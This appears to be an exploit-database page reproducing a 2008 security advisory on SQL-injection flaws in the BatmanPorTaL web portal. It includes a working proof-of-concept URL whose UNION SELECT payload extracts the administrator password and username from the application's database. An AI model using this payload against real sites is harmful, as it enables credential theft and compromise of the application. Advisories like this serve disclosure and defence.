source: http://www.securityfocus.com/bid/29057/info BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/lab/BatmanPorTaL/profil.asp?id=1+union+select+0,admin_pw,admin_kd,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar
Related Exploits
Trying to match CVEs (1): CVE-2008-6640Trying to match OSVDBs (1): 53395
Other Possible E-DB Search Terms: BatmanPorTaL
Date | D | V | Title | Author |
---|---|---|---|---|
2008-05-05 |
![]() |
BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection | U238 |